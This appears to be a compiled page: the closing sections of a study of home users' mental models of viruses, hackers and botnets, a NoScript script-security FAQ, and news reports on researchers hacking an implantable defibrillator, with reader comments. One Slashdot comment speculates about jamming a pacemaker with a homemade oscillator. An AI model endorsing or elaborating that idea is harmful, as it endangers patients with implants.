Advice 1–3 has to do with anti-virus technology: Advice #1 states that anti-virus software should be used; #2 states that the virus signatures need to be constantly updated to be able to detect current viruses; and #3 states that the anti-virus software should regularly scan a computer to detect viruses. All of these are best practices for using anti-virus software. Respondents mostly use their folk models of viruses to make decisions about anti-virus use, for obvious reasons. Respondents who believe that viruses are just buggy software also believe it is not necessary to run anti-virus. They think they can keep viruses off of their computer by controlling what gets installed on their computer; they believe viruses need to be executed manually to infect a computer, and if they never execute one then they don’t need anti-virus. Respondents with the under-developed folk model of viruses, who refer to viruses as generically ‘bad,’ also do not use anti- virus software. These people understand that viruses are harmful and that anti-virus software can stop them. However, they have never really thought about specific harms a virus might cause to them. Lacking an understanding of the threats and potential harm, they generally find it unnecessary to exert the effort to follow the best practices around anti-virus software. Finally, one group of respondents believe that anti-virus software can help stop hackers. Users with the burglar model of hackers believe that regular anti-virus scans can be important because these burglar-hackers will sometimes install viruses to collect personal information. Regular anti-virus use can help detect these hackers.

3.2 Other Security Software
Advice #4 concerns other types of security software; home computer users should run a firewall or more comprehensive Internet security suite. I think that most of the respondents didn’t understand what this security software did, other than a general notion of providing “security.” As such, no one included security software as an important component of their mental model. Respondents who held the graffiti-hacker or burglar-hacker models believed that this software must help with hackers somehow, even though they don’t know how, and would suggest installing it. But since they do not understand how it works, they do not consider it of vital importance. This highlights an opportunity for home user education; if these respondents better understood how security software helps protect against hackers, they might be more interested in using it and maintaining it. One interesting belief about this software comes from the respondents who believe hackers only go after big fish. For these respondents, security software can serve as a speed-bump that discourages hackers from casually breaking into their computer. For these people, they don’t care exactly how it works as long as it does something.

3.3 Email Security
Advice #5 is the only piece of advice about email on my list. It states that you shouldn’t open attachments from people you don’t recognize. Everyone in my sample was familiar with this advice and had taken it to heart. Everyone believed that viruses can be transmitted through email attachments, and therefore not clicking on unknown attachments can help prevent viruses.

3.4 Web Browsing
Advice 6-9 all deal with security behaviors while browsing the web. Advice #6 states that users need to ensure that they only download and run programs from trustworthy sources. Many types of malware are spread through downloads. #7 states that users should only browse web-pages from trustworthy sources. There are many types of malicious websites such as phishing websites, and some websites can spread malware simply by visiting the site and executing the javascript on the website. #8 states that users should disable scripting like Java and JavaScript in their web browsers. Often there are vulnerabilities in these scripts, and some malware uses these vulnerabilities to spread. And #9 suggests using good passwords so attackers cannot guess their way into your accounts. Overall, many respondents would agree with most of this advice. However, no one seemed to understand the advice about web scripts; indeed, no one seemed to even understand what a web script was. Advice #8 was largely ignored because it wasn’t understood. Everyone understood the need for care in choosing what to download. Downloads were strongly associated with viruses in most respondents’ minds. However, only users with well- developed models of viruses (the Mischief and Support Crime models) believed that viruses can be “caught” simply by browsing web pages. People who believed that viruses were buggy software didn’t see browsing as dangerous because they weren’t actively clicking on anything to run it. While all of the respondents expressed some knowledge of the importance of passwords, few exerted extra effort to make good passwords. Everyone understood that, in general, passwords are important, but they couldn’t explain why. Respondents with the graffiti hacker model would sometimes put extra effort into their passwords so that mischievous hackers couldn’t mess up their accounts. And respondents who believed that hackers only target big fish thought that passwords could be an effective speed bump to prevent hackers from casually targeting them. Respondents who believed in hackers as contractors to criminals uniformly believed that they were not targets of hackers and were therefore safe. However, they were careful in choosing which websites to do business with. Since these hackers targeted web businesses with lots of personal or financial information, it is important to only do business with websites that are trusted to be secure.

3.5 Computer Maintenance
Finally, Advice 10-12 concerns computer maintenance. Advice #10 suggests that users make regular backups in case some of their data is lost or corrupted. This is good advice for both security and non-security reasons. #11 states that it is important to keep the system patched with the latest updates to protect against known vulnerabilities that hackers and viruses can exploit. And #12 echoes the old maxim that the most secure machine is one that is turned off. Different models had dramatically different suggestions as to which types of maintenance are important. For example, mischievous viruses and graffiti hackers can cause data loss, so users with those models feel that backups are very important. But users who believe in more criminal viruses and hackers don’t feel that backups are necessary; hackers and viruses steal information but don’t delete it. Patching is an important piece of advice, since hackers and viruses need vulnerabilities to exploit. Most respondents only experience patches through the automatic updates feature in their operating system or applications. Respondents mostly associated the patching advice with hackers; respondents who felt that they would be a target of hackers also felt that patching was an import tool to stop hackers. Respondents who believed that viruses are buggy software feel that viruses also bring out more bugs in other software on the computer; patching the other software makes it more difficult for viruses to cause problems.

This study was inspired by the recent rise of botnets as a strategy for malicious attackers. Understanding the folk models that home computer users employ in making security decisions sheds light on why botnets are so successful. Modern botnet software seems designed to take advantage of gaps and security weaknesses in multiple folk models. I begin by listed a number of stylized facts about botnets. These facts are not true about all botnets and botnet software, but these facts are true about many of the recent and large botnets.

1. Botnets attack third parties. When botnet viruses compromise a machine, that machine only serves as a worker. That machine is not the end goal of the attacker. The owner of the botnet intends to use that machine (and many others) to cause problems for third parties.
2. Botnets only want the Internet connection The only thing the botnet wants on the victim computer is the Internet connection. Botnet software rarely takes up much space on the hard drive, rarely looks at existing data on the hard drive, rarely occupies much memory, and usually don’t use much CPU. Nothing that makes the computer unique is important.
3. Botnets don’t directly harm the host computer. Most botnet software, once installed, does not directly cause harm to the machine it is running on. It consumes resources, but often botnet software is configured to only use the resources at times they are otherwise unused (like running in the middle of the night). Some botnets even install patches and software updates so that other botnets cannot also use the computer.
4. Botnets spread automatically through vulnerabilities. Botnets often spread through automated compromises. They automatically scan the internet, compromise any vulnerable computers, and install copies of the botnet software on the compromised computers. No human intervention is required; neither the attacker nor the zombie owner nor the vulnerable computer owner need to be sitting at their computer at the time.
These stylized facts about botnets are not true for all botnets, but hold for many of the current, large, well-known, and well-studies botnets. I believe that botnet software effectively takes advantage of the limited and incomplete nature of the folk models of home computer users. Table 4 illustrates how each model does or does not incorporate the possibility of each of the stylized facts about botnets.

Botnets attack third parties.
None of the hacker models would predict that compromises would be used to attack third parties. Respondents who held both the Big Fish mental model and the Contractor mental model believe that, since hackers don’t want anything on the computer, they would target other computers and leave the unwanted computer alone. Respondents with the Burglar model believe that they might be a target, but only because the hacker wants something that might be on their computer. They would believe that once the hacker either finds what they were looking for, or cannot find anything interesting, then the hacker would leave. Respondents with the Graffiti model believe that hacking and vandalizing the computer is the end goal; it would never cross their mind to then use that computer to attack third parties. None of the respondents used their virus models to discuss potential third parties either. A couple of respondents with the Viruses are Bad model mentioned that once they got a virus, it might try to “spread.” However, they had no idea how this spreading might happen. Spreading is a form of harm to third parties; however, it is not the coordinated and intentional harm that botnets cause. Respondents who employed the other three virus models never mentioned the possibility of spreading beyond their computers. They were mostly focused on what the virus would do to them, and not to how it might affect others. Also, since they had an idea of how viruses spread, those ideas only involved spreading through webpages and email. They don’t run a webpage on their computer, and no one acknowledged that a virus could use their email to send copies out.

Botnets only want the Internet connection.
No one in this study could conceive of a hacker or virus that only wanted the Internet connection of their computer. The three crime-based hacker models (Burglar, Big Fish, and Contractor ) all believe that hackers are actively looking for something stored on the computer. All the respondents with these three models believed that their computer had (or might have) some specific and unique information that hackers wanted. Respondents with the Graffiti model believed that computers are a sort of canvas for digital mischief. I would guess that they might believe that botnet owners would only want the Internet connection; they believe there is nothing unique about their computer that makes hackers want to do digitial graffiti on their computer. None of the virus models would have anything to say about this fact. Respondents with the Viruses are Bad model and the Buggy Software models didn’t attribute any intentionality to viruses. Respondents with the Mischief and Support Crime models believed viruses were created for a reason, but didn’t seem to think about how using the computer to spread.

Botnets don’t harm the host computer.
This is the one stylized fact on this list that any respondents explicitly mentioned. Respondents with the Supports Crime model believe that viruses might try to hide on the computer and not display any outward signs of their presence. Respondents who employ one of the other three virus models would find this strange; to them, viruses always create visible effects. To users with the Mischief model, these visible effects are the main point of the virus! Additionally, the three folk models of hackers that relate to crime all include the idea that a ‘break in’ by hackers might not harm the computer. To these respondents, since hackers are just looking for information, they don’t necessarily want to harm the computer. Respondents who use the Graffiti model would find compromises that don’t harm the computer to be strange, as the main purpose of ‘breaking into’ computers is to vandalize them.

Botnets spread automatically.
The idea that botnets spread without human intervention would be strange to most of the respondents. Almost all of the respondents believed that hackers had to be sitting in front of some computer somewhere when they were “breaking into” computers. Indeed, two of the respondents even asked the interviewer how it was possible to use a computer without being in front of it. Most respondents belived that viruses generally also required some form of human intervention in order to spread. Viruses could be ‘caught’ by visiting webpages, by down- loading software, or by clicking on emails. But all of those required someone to actively use the computer. Only one subject explicitly mentioned that viruses can “just happen” (Jack). Respondents with the Viruses are Bad model understood that viruses could spread, but didn’t know how. These respondents might not be surprised to learn that viruses can spread without human intervention, but probably haven’t thought about it enough for that fact to be salient.

Botnets are extremely cleverly designed. They take advantage of home computer users by operating in a very different manor from the one conceived of by the respondents in this study. The only stylized fact listed above that a decent number of my respondents would recognize as a property of attacks is that botnets don’t cause harm to the host computer. And not everyone in the study would believe this; some respondents had a mental model where not harming the computer wouldn’t make sense. This analysis illustrates why eliminating botnets is so difficult. Many home computer users probably have similar folk models to the ones possessed by the respondents in this study. If so, botnets look very different from the threats envisioned by many home computer users. Since home computer users do not see this as a potential threat, they do not take appropriate steps to protect themselves.

Home computer users conceptualize security threats in multiple ways; consequently, users make different decisions based on their conceptualization. In my interviews, I found four distinct ways of thinking about malicious software as a security threat: the ‘viruses are bad,’ ‘buggy software,’ ‘viruses cause mischief,’ and ‘viruses support crime’ models. I also found four more distinct ways of thinking about malicious computer users as a threat: thinking of malicious others as ‘graffiti artists,’ ‘burglars,’ ‘internet criminals who target big fish,’ and ‘contractors to organized crime.’ I did not use a generalizable sampling method. I am able to describe a number of different folk models, but I cannot estimate how prevalent each model is in the population. Such estimates would be useful in understanding nationwide vulnerability, but I leave these estimates to future work. I also cannot say if my list of folk models is exhaustive — there may be more models than I describe — but it does represent the opinions of a variety of home computer users. Indeed, the snowball sampling method increases the chances that I will interview users with similar folk model despite the demographic heterogeneity of my sample. Previous literature [12, 15] was able to describe some basic security beliefs held by non-technical users; I provide structure to these theories by understanding how home computer users group these into semi-coherent mental models in their mind. My primary contribution with this study is an understanding of why users strictly follow some security advice from computer security experts and ignore other advice. This illustrates one major problem with security education efforts: they do not adequately explain the threats that home computer users face; rather they focus on practical, actionable advice. But without an understanding of threats, home computer users intentionally choose to ignore advice that they don’t believe will help them. Security education efforts should focus not only on recommending what actions to take, but also emphasize why those actions are necessary. Following the advice of Kempton [19], security experts should not evaluate these folk models on the basis of correctness, but rather on how well they meet the needs of the folk that possess them. Likewise, when designing new security technologies, we should not attempt to force users into a more ‘correct’ mental model; rather, we should design technologies that encourage users with limited folk models to be more secure. Effective security technologies need to protect the user from attacks, but also expose potential threats to the user in a way the user understands so that he or she is motivated to use the technology appropriately.

I appreciate the many comments and help during the whole pro ject from Jeff MacKie-Mason, Judy Olson, Mark Ackerman, and Brian Noble. Tiffany Vienot was also extremely helpful in helping me explain my methodology clearly. This material is based upon work supported by the National Science Foundation under Grant No. CNS 0716196.

[1] A. Adams and M. A. Sasse. Users are not the enemy. Communications of the ACM, 42(12):40–46, December 1999.
[2] R. Anderson. Why cryptosystems fail. In CCS ’93: Proceedings of the 1st ACM conference on Computer and communications security, pages 215–227. ACM Press, 1993.
[3] F. Asgharpour, D. Liu, and L. J. Camp. Mental models of computer security risks. In Workshop on the Economics of Information Security (WEIS), 2007.
[4] P. Bacher, T. Holz, M. Kotter, and G. Wicherski. Know your enemy: Tracking botnets. from the Honeynet Pro ject, March 2005.
[5] P. Barford and V. Yegneswaran. An inside look at botnets. In Special Workshop on Malware Detection, Advances in Information Security. Springer-Verlag, 2006.
[6] J. L. Camp. Mental models of privacy and security. Available at, August 2006.
[7] L. J. Camp and C. Wolfram. Pricing security. In Proceedings of the Information Survivability Workshop, 2000.
[8] A. Collins and D. Gentner. How people construct mental models. In D. Holland and N. Quinn, editors, Cultural Models in Language and Thought. Cambridge University Press, 1987.
[9] R. Contu and M. Cheung. Market share: Security market, worldwide 2008. Gartner Report:
, June 2009.
[10] L. F. Cranor. A framework for reasoning about the human in the loop. In Usability, Psychology, and Security Workshop. USENIX, 2008.
[11] R. D’Andrade. The Development of Cognitive Anthropology. Cambridge University Press, 2005.
[12] P. Dourish, R. Grinter, J. D. de la Flor, and M. Joseph. Security in the wild: User strategies for managing security as an everyday, practical problem. Personal and Ubiquitous Computing, 8(6):391–401, November 2004.
[13] D. M. Downs, I. Adema j, and A. M. Schuck. Internet security: Who is leaving the ’virtual door’ open and why? First Monday, 14(1-5), January 2009.
[14] R. E. Grinter, W. K. Edwards, M. W. Newman, and N. Ducheneaut. The work to make a home network work. In Proceedings of the 9th European Conference on Computer Supported Cooperative Work (ECSCW ’05), pages 469–488, September 2005.
[15] J. Gross and M. B. Rosson. Looking for trouble: Understanding end user security management. In Symposium on Computer Human Interaction for the Management of Information Technology (CHIMIT), 2007.
[16] C. Herley. So long, and no thanks for all the externalities: The rational rejection of security advice by users. In Proceedings of the New Security Paradigms Workshop (NSPW), September 2009.
[17] P. Johnson-Laird, V. Girotto, , and P. Legrenzi. Mental models: a gentle guide for outsiders. Available at, 1998.
[18] P. N. Johnson-Laird. Mental models in cognitive science. Cognitive Science: A Multidisciplinary Journal, 4(1):71–115, 1980.
[19] W. Kempton. Two theories of home heat control. Cognitive Science: A Multidisciplinary Journal, 10(1):75–90, 1986.
[20] A. J. Kuzel. Sampling in qualitative inquiry. In B. Crabtree and W. L. Miller, editors, Doing Qualitative Research, chapter 2, pages 31–44. Sage Publications, Inc., 1992.
[21] J. Markoff. Attack of the zombie computers is a growing threat, experts say. New York Times, January 7 2007.
[22] D. Medin, N. Ross, S. Atran, D. Cox, J. Coley, J. Proffitt, and S. Blok. Folkbiology of freshwater fish. Cognition, 99(3):237–273, April 2006.
[23] M. B. Miles and M. Huberman. Qualitative Data Analysis: An Expanded Sourcebook. Sage Publications, Inc., 2nd edition edition, 1994. MilesHuberman1994.
[24] A. J. Onwuegbuzie and N. L. Leech. Validity and qualitative research: An oxymoron? Quality and Quantity, 41:233–249, 2007.
[25] D. Russell, S. Card, P. Pirolli, and M. Stefik. The cost structure of sensemaking. In Proceedings of the INTERACT ’93 and CHI ’93 conference on Human factors in computing system, 1993.
[26] Trend Micro. Taxonomy of botnet threats. Whitepaper, November 2006.

This appendix contains samples of data matrix displays that were developed during the data analysis phase of this project.

Rick Wash
email : wash [at] msu [edu] edu


Q: Why can I sometimes see about:blank and/or wyciwyg: entries? What scripts are causing this?
A:   about:blank is the common URL designating empty (newly created) web documents. A script can “live” there only if it has been injected (with document.write() or DOM manipulation, for instance) by another script which must have its own permissions to run. It usually happens when a master page creates (or statically contains) an empty sub-frame (automatically addressed as about:blank) and then populates it using scripting. Hence, if the master page is not allowed, no script can be placed inside the about:blank empty page and its “allowed” privileges will be void. Given the above, risks in keeping about:blank allowed should be very low, if any. Moreover, some Firefox extensions need it to be allowed for scripting in order to work. Sometimes, especially on partially allowed sites, you may see also a wyciwyg: entry. It stands for “What You Cache Is What You Get”, and identifies pages whose content is generated by JavaScript code through functions likedocument.write(). If you can see such an entry, you already allowed the script generating it, hence the aboveabout:blank trust discussion applies to this situation as well.

Q: Why should I allow JavaScript, Java, Flash and plugin execution only for trusted sites?
A:   JavaScriptJava and Flash, even being very different technologies, do have one thing in common: they execute on your computer code coming from a remote site. All the three implement some kind of sandbox model, limiting the activities remote code can perform: e.g., sandboxed code shouldn’t read/write your local hard disk nor interact with the underlying operating system or external applications. Even if the sandboxes were bullet proof (not the case, read below) and even if you or your operating system wrap the whole browser with another sandbox (e.g. IE7+ on Vista or Sandboxie), the mere ability of running sandboxed code inside the browser can be exploited for malicious purposes, e.g. to steal important information you store or enter on the web (credit card numbers, email credentials and so on) or to “impersonate” you, e.g. in fake financial transactions, launching “cloud” attacks like Cross Site Scripting (XSS) or CSRF, with no need for escaping your browser or gaining privileges higher than a normal web page. This alone is enough reason to allow scripting on trusted sites only. Moreover, many security exploits are aimed to achieve a “privilege escalation”, i.e. exploiting an implementation error of the sandbox to acquire greater privileges and perform nasty task like installing trojans, rootkits and keyloggers.

This kind of attack can target JavaScript, Java, Flash and other plugins as well:

  1. JavaScript looks like a very precious tool for bad guys: most of the fixed browser-exploitable vulnerabilities discovered to date were ineffective if JavaScript was disabled. Maybe the reason is that scripts are easier to test and search for holes, even if you’re a newbie hacker: everybody and his brother believe to be a JavaScript programmer :P
  2. Java has a better history, at least in its “standard” incarnation, the Sun JVM. There have been viruses, instead, written for the Microsoft JVM, like the ByteVerifier.Trojan. Anyway, the Java security model allows signed applets (applets whose integrity and origin are guaranteed by a digital certificate) to run with local privileges, i.e. just like they were regular installed applications. This, combined with the fact there are always users who, in front of a warning like “This applet is signed with a bad/fake certificate. You DON’T want to execute it! Are you so mad to execute it, instead? [Never!] [Nope] [No] [Maybe]”, will search, find and hit the “Yes” button, caused some bad reputation even to Firefox (notice that the article is quite lame, but as you can imagine had much echo).
  3. Flash used to be considered relatively safe, but since its usage became so widespread severe security flaws have been found at higher rate. Flash applets have also been exploited to launch XSS attacksagainst the sites where they’re hosted.
  4. Other plugins are harder to exploit, because most of them don’t host a virtual machine like Java and Flash do, but they can still expose holes like buffer overruns that may execute arbitrary code when fed with a specially crafted content. Recently we have seen several of these plugin vulnerabilities, affecting Acrobat Reader, Quicktime, RealPlayer and other multimedia helpers.

Please notice that none of the aforementioned technologies is usually (95% of the time) affected by publicly known and still unpatched exploitable problems, but the point of NoScript is just this: preventing exploitation of even unknown yet security holes, because when they are discovered it may be too late ;) The most effective way is disabling the potential threat on untrusted sites.

Q:  What is a trusted site?
A:  A “trusted site” is a site whose owner is well identifiable and reachable, so I have someone to sue if he hosts malicious code which damages or steals my data.* If a site qualifies as “trusted”, there’s no reason why I shouldn’t allow JavaScript, Java or Flash. If some content is annoying, I can disable it with AdBlock. What I’d like to stress here is that “trust” is not necessarily a technical matter. Many online banking sites require JavaScript and/or Java, even in contexts where these technologies are absolutely useless and abused: for more than 2 years I’ve been asking my bank to correct a very stupid JavaScript bug preventing login from working with Firefox. I worked around this bug writing an ad hoc bookmarklet, but I’m not sure the average Joe user could.

So, should I trust their mediocre programmers for my security? Anyway, if something nasty happens with my online bank account because it’s unsafe, I’ll sue them to death (or better, I’ll let the world know) until they refund me. So you may say “trust” equals “accountability”. If you’re more on the technical side and you want to examine the JavaScript source code before allowing, you can help yourself with JSView.

* You may ask, what if site I really trust gets compromised? Will I get infected as well because I’ve got it in my whitelist, ending to sue as you said? No, you won’t, most probably. When a respectable site gets compromised, 99.9% of the times malicious scripts are still hosted on a different domain which is likely not in your whitelist, and gets just included by the pages you trust. Since NoScript blocks 3rd party scripts which have not been explicitly whitelisted themselves, you’re still safe, with the additional benefit of an early warning :)

Hacking attacks can turn off heart monitors
by Richard Thurston / 12th March 2008

American researchers have proven it’s possible to maliciously turn off individuals’ heart monitors through a wireless hacking attack. Many thousands of people across the world have the monitors, medically known as implantable cardiac defibrillators (ICDs), installed to help their hearts beat regularly. ICDs treat abnormal heart conditions; more recent models also incorporate the abilities of a Pacemaker. Their function is to speed up a heartbeat which is too slow, or to deliver an electrical shock to a heart which is beating too quickly. According to the research by the Medical Device Security Center – which is backed by the Harvard Medical School among others – hackers would be able to intercept medical information on the patient, turn off the device, or, even worse, deliver an unnecessary electrical shock to the patient.

The hack takes advantage of the fact the ICD possesses a radio which is designed to allow reprogramming by a hospital doctor. The ICD’s radio signals are not encrypted, the Security Center said. The Security Center demonstrated the hack on an ICD made by Medtronic using a PC, radio hardware and an antenna. The ICD was not in a patient at the time. The research is detailed in a report released today. The report reveals that a hacker could “render the ICD incapable of responding to dangerous cardiac events. A malicious person could also make the ICD deliver a shock that could induce ventricular fibrillation, a potentially lethal arrhythmia.”

The Security Center says manufacturers of ICDs could implement several measures to prevent the threat. These include making the IMD produce an audible alert when an unauthorised party tries to communicate with their IMD. It also suggests employing cryptography to provide secure authentication for doctors. The researchers added that the risk facing patients is negligible. “We believe the risk to patients is low and that patients should not be alarmed,” it said in the report. “We do not know of a single case where an IMD patient has ever been harmed by a malicious security attack.” It added that hackers would need to be physically close to their intended victim and would need sophisticated equipment. The kit used in the demoed attack cost $30,000. The researchers omitted their methodology from the paper to help prevent such an attack ever happening, they said. Medtronic said the chance of such an attack is “extremely low”. Future versions of its IMDs, which will send radio signals ten metres, will incorporate stronger security, it told reporters.


“Manufacturers of medical devices have a duty to patients to produce safe products.  In lawsuits against Medtronic prepared by Lieff Cabraser, our clients allege that Medtronic misrepresented the safety of the Sprint Fidelis lead. Hundreds of injuries linked to Sprint Fidelis heart defibrillator wires had been reported to the FDA as of the end of 2006. The high and early failure rate of Medtronic Sprint Fidelis leads was also reported in a medical journal in 2006. Yet, Medtronic failed to issue a recall and instead continued to sell the devices.”

On the Road With Cheney
by Deb Riechmann  /  March 31, 2008

He travels with a green duffel bag stuffed with nonfiction books about military campaigns and political affairs. He has an iPod and noise-canceling earphones to listen to oldies and some country-western. Oh, and he has two planes, including a C-17 military transport with a 40-foot silver trailer in its belly for his privacy and comfort, and round-theclock bodyguards and medical staff. Aides pack the Diet Sprite — a Cheney favorite — keep the decaffeinated lattes flowing, and tune the tube to Fox News. Vice President Cheney is not your regular road warrior. Mr. Cheney returned Wednesday from a 10-day trip to Iraq, Oman, Afghanistan, Saudi Arabia, Israel, the Palestinian territory, and Turkey. The rigors of travel and ever-present security concerns make sightseeing difficult. Still, he squeezed in a little on his final stop in Istanbul. The vice president, his wife, Lynne, and daughter, Liz, saw Topkapi Palace, seat of the Ottoman sultans for almost 400 years. For all his globe-trotting, Mr. Cheney had never been to Istanbul, home of the Bosphorus Bridge that links Europe and Asia.

More often, Mr. Cheney’s days on the road are spent holed up on planes, helicopters, hotel rooms and stuffy government buildings. They are long, grueling days. His staffers say they have to run fast to keep up with a schedule that seems especially rigorous for a 67-year-old man who has had four heart attacks. Like the gadget inside his chest that makes sure his heart is beating in sync, Mr. Cheney paces himself. “Because he’s been doing it for so long, he has a pretty good sense of what’s important and what’s not important,” a former administration official, Liz Cheney, said. “He keeps his perspective, doesn’t let the little things get to him, you know. They sort of roll off, and he keeps his sense of humor,” she said in Saudi Arabia.

Pacemakers can be hijacked by radio  /  22 March 2008

It gives new meaning to the term “heart attack”.

Last week researchers led by William Maisel at Harvard University used a commercially available radio transmitter to hijack the software on a device that acts as both a heart pacemaker and defibrillator. The device was not implanted in anyone, but the experiment raises the prospect of hackers being able to disrupt a person’s heartbeat or stealthily administer damaging shocks. Is the threat of a hacker-instigated heart attack imminent? “The chances of someone being harmed by malicious reprogramming of their device is remote,” says Maisel. However, implanted drug pumps and neurostimulators, which deliver electrical pulses to the brain, could be more vulnerable to such attacks in future as they increasingly have wireless capabilities built in.

William H. Maisel, M.D., M.P.H.…
email : wmaisel [at] bidmc.harvard [dot] edu

Dr. William H. Maisel is director of the Medical Device Safety Institute at Beth Israel Deaconess Medical Center and assistant professor of medicine at Harvard Medical School. He has an active cardiology practice and also directs the Pacemaker and Defibrillator Service at Beth Israel Deaconess Medical Center. His research interests involve the safe and effective use of medical devices, and he has published extensively on the safety of pacemakers and defibrillators, drug-eluting stents and other cardiovascular devices. He received his M.D. from Cornell University, his MPH from the Harvard School of Public Health, and completed his internal medicine and cardiovascular training at Brigham and Women’s Hospital. Maisel is an FDA consultant and former Chairman of the FDA’s Circulatory System Medical Device Advisory Panel.

A better method (Score:5, Interesting) /  by yamamushi
“The article details how the researchers had to be within 2 inches of the pacemaker, and several thousands of dollars worth of equipment. I suspect there is an easier way to deactivate a pacemaker, find out what frequency they operate at. I’ve got an FM radio blocker, that is basically just a 100mhz oscillator, a potentiometer, and a battery. It works by canceling out a given frequency, thus letting me silence my neighbors stereo from 50ft away. I know the technique works for the 2.4ghz band, for blocking out wireless phone signals and whatnot. I suppose finding an oscillator in the high ghz range would suffice for ‘killing’ a pacemaker.”

Re:Ah, the smart-arse non-sequiturs (Score:5, Informative) /  by I_Love_Pocky!
“I appreciate your enthusiasm, but thank god you aren’t designing these devices. I work for one of the competitors to Medtronic (the company whose devices were studied). We have encryption in our RF communication. We DO take security into consideration, but there are trade offs that have to be considered. Battery life is generally the most important consideration. Every time surgery needs to be performed to physically access the device (usually because of a depleted battery) there is a risk of complications. These aren’t insignificant risks either. Keep in mind the people getting these devices have health problems of some sort or they wouldn’t be getting them. With that in mind, security solutions in this domain have to be very well thought out so as to avoid draining the battery significantly. So please, don’t for a second presume that we are a bunch of monkeys sitting around on our asses ignoring real concerns. The real issue is that there are far more concerns than you are aware of. We do evaluate these concerns and try to build the best devices possible with the fewest compromises.”

Hacking the VP (Score:5, Funny)  /  by tobiasly
“Yes, that’s a very real concern that the secret service has been terrified of for years. Most people know that Cheney has a pacemaker, but the real secret is that they forgot to turn off SSID broadcast and its password is ‘Linksys’.”

Will the bionic man have virus protection?
by John Borland  /  August 09, 2007

Gadi Evron, a prominent Israeli network security expert, has some questions about a future when we let software into our bionic, cybernetic bodies. Say we really do start modifying ourself, he asked a late-night crowd here at the Chaos Computer Camp. Presumably, that means a bit of hardware, a bit of software. And as any security consultant knows, every piece of software ever written by an actual human is riddled with flaws and bugs, which translate all too easily into security flaws. Suddenly a whole slew of problems familiar to the network security world appear. If someone finds a bug in a bionic body part, what are the ethical issues? Should it be reported widely? Just to the company producing the component? Hidden, or sold for profit? And what about patches? Will people line up at schools for heart-implant fixes, like for today’s flu shot? Will viruses distribute false patches, and infect body parts? Or an apocalyptic scenario: What if our cybernetic tools synchronized themselves with Outlook. With wireless connections, viruses could even spread, well, through the air. What kind of intellectualPirates property issues could arise? Pirates, crackers, ransom-artists, virus-writers, all focused on the body instead of the laptop.  In part, Evron uses these analogies to demonstrate issues in computer security to non- experts, for whom the idea of body-hacking might help illustrate problems. But it’s also a daunting take on strains in biology and genetics that are only barely still science fiction. A little of the computer security mindset would be a healthy thing as we enter the uncharted territory of body modification, he argues. “Biology needs to undergo a computer science infusion,” Evron said. “We need to reverse engineer genetics.”

A Heart Device Is Found Vulnerable to Hacker Attacks
by Barnaby J. Feder  /  March 12, 2008

To the long list of objects vulnerable to attack by computer hackers, add the human heart. The threat seems largely theoretical. But a team of computer security researchers plans to report Wednesday that it had been able to gain wireless access to a combination heart defibrillator and pacemaker. They were able to reprogram it to shut down and to deliver jolts of electricity that would potentially be fatal — if the device had been in a person. In this case, the researcher were hacking into a device in a laboratory. The researchers said they had also been able to glean personal patient data by eavesdropping on signals from the tiny wireless radio that Medtronic, the device’s maker, had embedded in the implant as a way to let doctors monitor and adjust it without surgery. The report, to published at, makes clear that the hundreds of thousands of people in this country with implanted defibrillators or pacemakers to regulate their damaged hearts — they include Vice President Dick Cheney — have no need yet to fear hackers. The experiment required more than $30,000 worth of lab equipment and a sustained effort by a team of specialists from the University of Washington and the University of Massachusetts to interpret the data gathered from the implant’s signals. And the device the researchers tested, a combination defibrillator and pacemaker called the Maximo, was placed within two inches of the test gear.

Defibrillators shock hearts that are beating chaotically and dangerously back into normal rhythms. Pacemakers use gentle stimulation to slow or speed up the heart. Federal regulators said no security breaches of such medical implants had ever been reported to them. The researchers said they chose Medtronic’s Maximo because they considered the device typical of many implants with wireless communications features. Radios have been used in implants for decades to enable doctors to test them during office visits. But device makers have begun designing them to connect to the Internet, which allows doctors to monitor patients from remote locations. The researchers said the test results suggested that too little attention was being paid to security in the growing number of medical implants being equipped with communications capabilities. “The risks to patients now are very low, but I worry that they could increase in the future,” said Tadayoshi Kohno, a lead researcher on the project at the University of Washington, who has studied vulnerability to hacking of networked computers and voting machines. The paper summarizing the research is called “Pacemakers and Implantable Cardiac Defibrillators: Software Radio Attacks and Zero-Power Defenses.” The last part refers to defensive possibilities the researchers outlined that they say would enhance security without draining an implant’s battery. They include methods for warning a patient of tampering or requiring that an incoming signal be authenticated, using energy harvested from the incoming signals. But Mr. Kohno and Kevin Fu, who led the University of Massachusetts arm of the project, said they had not tried to test the defenses in an actual implant or to learn if anyone trying to use them might run afoul of existing patent claims. Another participant in the project, Dr. William H. Maisel, a cardiologist who is director of the Medical Device Safety Institute at the Beth Israel Deaconess Medical Center in Boston, said that the results had been shared last month with the F.D.A., but not with Medtronic. “We feel this is an industry-wide issue best handled by the F.D.A.,” Dr. Maisel said.

The F.D.A. had already begun stepping up scrutiny of radio devices in implants. But the agency’s focus has been primarily on whether unintentional interference from other equipment might compromise the safety or reliability of the radio-equipped medical implants. In a document published in January, the agency included security in a list of concerns about wireless technology that device makers needed to address. Medtronic, the industry leader in cardiac regulating implants, said Tuesday that it welcomed the chance to look at security issues with doctors, regulators and researchers, adding that it had never encountered illegal or unauthorized hacking of its devices that have telemetry, or wireless control, capabilities. “To our knowledge there has not been a single reported incident of such an event in more than 30 years of device telemetry use, which includes millions of implants worldwide,” a Medtronic spokesman, Robert Clark, said. Mr. Clark added that newer implants with longer transmission ranges than Maximo also had enhanced security. Boston Scientific, whose Guidant division ranks second behind Medtronic, said its implants “incorporate encryption and security technologies designed to mitigate these risks.” St. Jude Medical, the third major defibrillator company, said it used “proprietary techniques” to protect the security of its implants and had not heard of any unauthorized or illegal manipulation of them. Dr. Maisel urged that patients not be alarmed by the discussion of security flaws. “Patients who have the devices are far better off having these devices than not having them,” he said. “If I needed a defibrillator, I’d ask for one with wireless technology.”

Studies Show Reliability, Failure Rates for Cardiac Devices

Pacemakers and implantable cardioverter-defibrillators (ICDs) are among the most clinically important and technically complex medical devices in use today, but several recent high-profile device malfunctions have called into question their safety and reliability. Two reports in the April 26, 2006 issue of The Journal of the American Medical Association (JAMA) offer new insights into pacemaker and ICD performance by providing the most comprehensive analysis of malfunction data available to date. “Despite millions of pacemaker and ICD implants worldwide and their increasingly frequent use, surprisingly little is known about device reliability,” says the studies’ lead author William H. Maisel, MD, MPH, director of the Pacemaker and Device Service at Beth Israel Deaconess Medical Center (BIDMC) and Assistant Professor of Medicine at Harvard Medical School. The devices work to stabilize abnormal heart rhythms, pacemakers by treating hearts that beat too slowly and ICDs by treating heart rhythms that have become dangerously fast.

